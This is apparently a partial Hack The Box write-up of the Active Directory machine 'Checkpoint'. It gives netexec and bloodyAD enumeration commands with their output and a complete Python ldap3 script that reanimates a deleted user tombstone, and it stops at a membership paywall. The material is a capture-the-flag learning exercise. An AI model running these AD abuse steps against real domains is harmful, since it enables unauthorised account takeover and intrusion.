Overview
Checkpoint is an Active Directory-focused Hack The Box machine that rewards careful enumeration, AD object abuse, and an understanding of how internal automation can become an execution path. The box begins with valid domain credentials and expands into a chain involving a writable deleted object, a malicious VS Code extension, Kerberos delegation, dMSA (delegated Managed Service Account) abuse, and offline memory extraction from a VMware snapshot.
What makes this machine stand out is that no single exploit is enough on its own. Each phase exposes the next: AD permissions lead to share access, share access leads to code execution, code execution leads to Kerberos material, and that access eventually opens the path to privileged backup data and the final administrator hash.
Initial Reconnaissance
The first step was network discovery using RustScan against the target host.
rustscan -a 10.129.168.103 --ulimit 5000
The scan identified the box as a Windows domain controller and showed the standard AD port set, including DNS, Kerberos, LDAP, SMB, and WinRM-related services. This confirmed that the machine was built around an internal Windows domain rather than a public-facing application.
SMB Enumeration
With the provided credentials, SMB authentication succeeded immediately and confirmed the domain identity. The banner also reports signing:True, so SMB signing is enforced on DC01 and NTLM relay to this host is off the table.
netexec smb checkpoint.htb -u alex.turner -p 'Checkpoint2024!' --shares
Output:
SMB 10.129.168.103 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:checkpoint.htb) (signing:True) (SMBv1:None)
SMB 10.129.168.103 445 DC01 [+] checkpoint.htb\alex.turner:Checkpoint2024!
SMB 10.129.168.103 445 DC01 [*] Enumerated shares
SMB 10.129.168.103 445 DC01 Share Permissions Remark
SMB 10.129.168.103 445 DC01 ----- ----------- ------
SMB 10.129.168.103 445 DC01 ADMIN$ Remote Admin
SMB 10.129.168.103 445 DC01 C$ Default share
SMB 10.129.168.103 445 DC01 DevDrop READ VS Code extensions share for approved .vsix packages compatible with VS Code engine 1.118.0
SMB 10.129.168.103 445 DC01 IPC$ READ Remote IPC
SMB 10.129.168.103 445 DC01 NETLOGON READ Logon server share
SMB 10.129.168.103 445 DC01 SYSVOL READ Logon server share
SMB 10.129.168.103 445 DC01 VMBackups
Two shares stood out. DevDrop, whose remark describes it as a drop point for approved .vsix packages targeting VS Code engine 1.118.0, is readable with these credentials, which suggests something on the box installs extensions from it. VMBackups could not be listed at all as alex.turner, but it later became relevant for privilege escalation.
Domain User Enumeration
Next, the domain users were enumerated.
netexec smb checkpoint.htb -u alex.turner -p 'Checkpoint2024!' --users
The results showed a normal enterprise user base, including ryan.brooks, svcdeploy, and mark.davies. Those accounts later became important because they fit into the access chain used to move through the environment.
Writable Object Discovery
The next step was to inspect writable AD objects.
bloodyAD --host 10.129.168.103 -d checkpoint.htb -u alex.turner -p 'Checkpoint2024!' get writable
Output:
distinguishedName: CN=Mark Davies,...,CN=Deleted Objects,DC=checkpoint,DC=htb permission: WRITE
distinguishedName: OU=Employees,DC=checkpoint,DC=htb permission: CREATECHILD
distinguishedName: CN=Alex Turner,OU=Employees,DC=checkpoint,DC=htb permission: WRITE
This was the first major pivot point. alex.turner held WRITE on the tombstone of mark.davies under CN=Deleted Objects, which meant the deleted account could be reanimated. Restoring a deleted AD object is an LDAP modify that clears isDeleted and moves the object back into a live container, so the CREATECHILD right on OU=Employees is not incidental: it is where the restored account can land.
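The restore itself, as an added example that is not part of the original writeup: a deleted AD object sits under CN=Deleted Objects with isDeleted=TRUE and an RDN of the form CN=<name>\0ADEL:<objectGUID>, and reanimating it is a single LDAP modify that removes isDeleted and replaces distinguishedName with a DN in a live container, sent with the LDAP_SERVER_SHOW_DELETED_OID control. The DNs and the OU=Employees target match the bloodyAD output above; the objectGUID in the sample DN, the function names, and the use of ldap3 (the same library bloodyAD builds on) are my assumptions.

```python
"""Tombstone reanimation over LDAP (added example, not from the original writeup).

A deleted AD object lives under CN=Deleted Objects with isDeleted=TRUE and an RDN of
the form "CN=<name>\\0ADEL:<objectGUID>"; the \\0A is the LDAP-escaped newline AD
inserts. Microsoft's restore rule is one LDAP modify that removes isDeleted and
replaces distinguishedName with a DN inside a live container, sent with the
LDAP_SERVER_SHOW_DELETED_OID control. The DNs and target OU match the bloodyAD
output; the objectGUID in the sample is constructed.
"""
import re

try:  # ldap3 is only needed to talk to a live DC; the DN logic runs without it
    from ldap3 import MODIFY_DELETE, MODIFY_REPLACE
except ImportError:  # these are the literal string constants ldap3 defines
    MODIFY_DELETE, MODIFY_REPLACE = "MODIFY_DELETE", "MODIFY_REPLACE"

SHOW_DELETED_OID = "1.2.840.113556.1.4.417"  # LDAP_SERVER_SHOW_DELETED_OID
SHOW_DELETED = [(SHOW_DELETED_OID, True, None)]  # ldap3 control: (oid, criticality, value)

# Constructed sample in the exact shape AD produces (the GUID is made up).
SAMPLE_TOMBSTONE_DN = (
    "CN=Mark Davies\\0ADEL:0c6d2e8b-1a5f-4b3e-9f7d-2b5a8c1e4d90,"
    "CN=Deleted Objects,DC=checkpoint,DC=htb"
)
TARGET_OU = "OU=Employees,DC=checkpoint,DC=htb"  # where alex.turner has CREATECHILD

_TOMBSTONE_RE = re.compile(
    r"^(CN=.+?)\\0ADEL:([0-9a-fA-F-]{36}),CN=Deleted Objects,", re.IGNORECASE
)


def split_tombstone_dn(dn):
    """Return (original RDN, objectGUID) for a Deleted Objects DN, else ValueError."""
    m = _TOMBSTONE_RE.match(dn)
    if not m:
        raise ValueError("not a tombstone DN: %r" % dn)
    return m.group(1), m.group(2)


def restore_dn(tombstone_dn, new_parent):
    """DN the object will have after reanimation into new_parent."""
    rdn, _guid = split_tombstone_dn(tombstone_dn)
    return "%s,%s" % (rdn, new_parent)


def build_undelete_modify(tombstone_dn, new_parent):
    """Changes and controls for ldap3 Connection.modify().

    Both edits must travel in ONE modify request: AD requires isDeleted to be
    removed and the DN rewritten in the same operation."""
    changes = {
        "isDeleted": [(MODIFY_DELETE, [])],
        "distinguishedName": [(MODIFY_REPLACE, [restore_dn(tombstone_dn, new_parent)])],
    }
    return changes, SHOW_DELETED


def find_tombstones(conn, base_dn, cn_prefix):
    """List deleted objects whose CN starts with cn_prefix (needs the control)."""
    conn.search(base_dn, "(&(isDeleted=TRUE)(cn=%s*))" % cn_prefix,
                attributes=["objectGUID", "lastKnownParent", "sAMAccountName"],
                controls=SHOW_DELETED)
    return [(e.entry_dn, str(e.lastKnownParent)) for e in conn.entries]


def undelete(conn, tombstone_dn, new_parent):
    """Reanimate the tombstone; returns (ok, LDAP result dict)."""
    changes, controls = build_undelete_modify(tombstone_dn, new_parent)
    ok = conn.modify(tombstone_dn, changes, controls=controls)
    return ok, conn.result


if __name__ == "__main__":
    import sys
    from ldap3 import Server, Connection, NTLM
    # usage: python undelete.py <dc-ip> 'checkpoint\alex.turner' '<password>'
    host, user, pwd = sys.argv[1:4]
    conn = Connection(Server(host, use_ssl=True), user=user, password=pwd,
                      authentication=NTLM, auto_bind=True)
    for dn, parent in find_tombstones(conn, "DC=checkpoint,DC=htb", "Mark Davies"):
        print("tombstone:", dn, "| last known parent:", parent)
        ok, result = undelete(conn, dn, TARGET_OU)
        print("restore ->", restore_dn(dn, TARGET_OU), ok, result.get("description"))
```

Two checks worth making before relying on the restored account: lastKnownParent on the tombstone tells you where it lived, which should agree with the container you have CREATECHILD on; and unless the AD Recycle Bin is enabled, a tombstone keeps only a handful of attributes (SID, sAMAccountName, userAccountControl, security descriptor), so the reanimated user normally needs a password reset and a userAccountControl review before it is usable.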
🔐 PREMIUM WRITEUP - MEMBERSHIP REQUIRED
This machine is still active in HTB, so the full walkthrough, exploitation path, and flags cannot be publicly released.